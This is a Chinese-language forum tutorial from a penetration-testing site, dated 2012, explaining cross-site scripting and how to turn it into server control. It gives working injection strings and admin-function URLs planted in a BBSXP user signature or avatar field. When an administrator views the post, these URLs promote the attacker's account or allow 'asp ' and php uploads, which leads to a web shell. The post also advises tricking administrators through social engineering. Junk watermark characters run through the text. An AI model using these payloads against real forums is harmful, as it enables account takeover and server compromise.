中国网络渗透测试联盟

标题: xss漏洞原理 [打印本页]

作者: admin    时间: 2012-9-13 17:07
标题: xss漏洞原理
一、什么是XSS攻击
1 z  f. j7 H) [. `0 i6 B1 r% z8 q9 D
  XSS又叫CSS  (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。XSS属于被动式的攻击,因为其被动且不好利用,所以许多人常呼略其危害性。而本文主要讲的是利用XSS得到目标服务器的shell。技术虽然是老技术,但是其思路希望对大家有帮助。
. ~2 X7 i( F3 N6 A
2 \, S7 P& p) A: M  如何寻找XSS漏洞- i+ a! W8 n: _5 B/ m
2 c$ Z. t( D6 H5 X$ V- Y/ T- ~
  就个人而言,我把XSS攻击分成两类,一类是来自内部的攻击,主要指的是利用程序自身的漏洞,构造跨站语句,如:dvbbs的showerror.asp存在的跨站漏洞。另一类则是来来自外部的攻击,主要指的自己构造XSS跨站漏洞网页或者寻找非目标机以外的有跨站漏洞的网页。如当我们要渗透一个站点,我们自己构造一个有跨站漏洞的网页,然后构造跨站语句,通过结合其它技术,如社会工程学等,欺骗目标服务器的管理员打开。0 J0 o# A+ p& G

  h& L  _4 [/ E6 g" U" ~( x  然后利用下面的技术得到一个shell.
* C+ M: C  L0 g! `& ~* B! b( V; M5 B. O1 F' o/ w/ l
  如何利用
$ G9 d, g- J0 Y* c+ x1 h9 Y
; w+ Q4 n* @/ Y7 K& c6 L; T  传统的跨站利用方式一般都是攻击者先构造一个跨站网页,然后在另一空间里放一个收集cookie的页面,接着结合其它技术让用户打开跨站页面以盗取用户的cookie,以便进一步的攻击。个人认为这种方式太过于落后,对于弊端大家可能都知道,因为即便你收集到了cookie你也未必能进一步渗透进去,多数的cookie里面的密码都是经过加密的,如果想要cookie欺骗的话,同样也要受到其它的条件的限约。而本文提出的另一种思路,则从一定程度上解决上述的问题。对于个人而言,比较成熟的方法是通过跨站构造一个表单,表单的内容则为利用程序的备份功能或者加管理员等功能得到一个高权限。下面我将详细的介绍这种技术。8 U/ |* T) `' o& e1 \8 k

7 x- E' z3 g3 h9 }. u  二、来自内部的跨站攻击  B( b& k5 {& `% u
4 ~. \  d* R7 I( E4 ]
  寻找跨站漏洞
: [  _8 }4 L& ^& q! f3 V7 J6 `9 C: c# n) d
  如果有代码的话比较好办,我们主要看代码里对用户输入的地方和变量有没有做长度和对”<”,”>”,”;”,”’”等字符是否做过滤。还有要注意的是对于标签的闭合,像测试QQ群跨站漏洞的时候,你在标题处输入<script>alert(‘test’)</script>,代码是不会被执行的,因为在源代码里,有其它的标签未闭合,如少了一个</script>,这个时候,你只要闭合一个</script>,代码就会执行,如:你在标题处输入</script><script>alert(‘test’)</script>,这样就可以弹出一个test的框。
/ W7 I, s: T1 b# `- s" J9 e' U
; z6 w4 i- p1 K& O# w! W, r  如何利用
! L6 l/ y2 j" q8 V# F1 R
) O4 z1 |' l" S/ U9 j- [) U  我先以BBSXP为例,过程已做成动画,详情可见光盘中的动画。我举BBSXP中其中两个比较好用的跨站漏洞点为例.
) Z2 {% t3 n, q% l! I" Y) C3 J+ H& M. G, O% d  c2 f& I) Q0 [2 K
7 U1 N# k4 \" y6 t
  a.先注册一个普通用户,我这里注册的用户是linzi.然后我们在个人签名里写入:. y! R( \  W3 \
: n& E$ Z/ w2 D3 v9 x! s8 K
http://127.0.0.1/bbsxp/admin_user.asp?menu=userok&username=linzi&membercode=5&userlife=1&posttopic=3&money=9&postrevert=0&savemoney=0&deltopic=1&regtime=2005-9-1+1%3A1%3A1&experience=9&country=%D6%D0%B9%FA&&Submit=+%B8%FC+%D0%C2+ ! B2 Y! h: R! Z" b3 p- Y* S
8 Z- F+ Z* b& z. L4 }+ u" z
  c.然后发个贴子,可以结合其它技术欺骗管理员浏览发的贴子。. Z; l4 K! A: X7 ]

- T- |8 b% i# S* K  O: n  d.因为是测试,所以我们以管理员身份登陆,然后打开贴子,我们会发现,linzi已经变成了社区区长工,如图一所示3 o- B( {% K/ e  S% [( `( ]
/ l! E- V) G& o+ _
  除此之外我们只要在个人签名里输入. A  n+ ~# L& j, L  W, W

6 F  y7 Z" P: e% G% q4 l3 Ehttp://127.0.0.1/bbsxp/admin_setup.asp?menu=variableok&clubname=+&homename=+&homeurl=&floor=2&PostTime=3&Timeout=6&OnlineTime=12&Reg10=10&style=1&selectup=FSO&MaxFace=10240&MaxPhoto=30720&MaxFile=102400&UpFileGenre=gif|jpg|asp%20|rar + ?: t- ~  |$ A5 O) w: r
; k: u6 b& O1 W
  同样发个贴子等,只要管理员打开了,就会加了一个扩展名为asp (有空格)的上传扩展,这个时候,你只要上传一个newmm.asp (有空格)就可以得到一个shell.
8 R, s$ P9 I7 Q: _. \9 ~( W- ^( H7 C! x; y( n

' h4 ^: J( |- E  上面的攻击多多少少有点局限性,虽然可以得到shell,但是隐蔽性不太好,因为签名处受到了长度的限制,不能超过255个字符。我们可以结合flash跨站实现更为隐蔽的攻击,对于flash木马的制作,下面见哥们丰初的介绍。
: r! E7 [. u: T+ o9 t0 ?
3 V. W; ~+ Y& w- M  再利用如下:( r1 K. P/ E% m! P
4 c) t0 l' d1 ~8 y3 S: C# t
  修改一下个人头像的url,输入代码如下:    admin_setup.asp? ( S1 Q8 f  d) f+ f
' s* v7 f; u4 o3 _! Y
menu=variableok&clubname=+&homename=+&homeurl=&floor=2&PostTime=3&Timeout=6&OnlineTime=12&Reg10=10&style=1&selectup=FSO&MaxFace=10240&MaxPhoto=30720&MaxFile=102400&UpFileGenre=gif|jpg|php|rar
# X' |9 \7 a1 }: |5 X& s' |$ H) I+ s2 F2 n3 P
  再接着欺骗管理员打开你的资料或者浏览你的贴子,当管理员打开后,会在后台自动加个php扩展名的后辍,因为bbsxp在个人头像url里过滤了空格,%,所以我们只能加个不包括空格的其它扩展,当然你也可以加个shtml的扩展,有了它你就可以用来查看源代码,然后进一步攻击。
( Z% m$ T& J2 Q7 L6 ]4 H+ V) u- j9 h




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2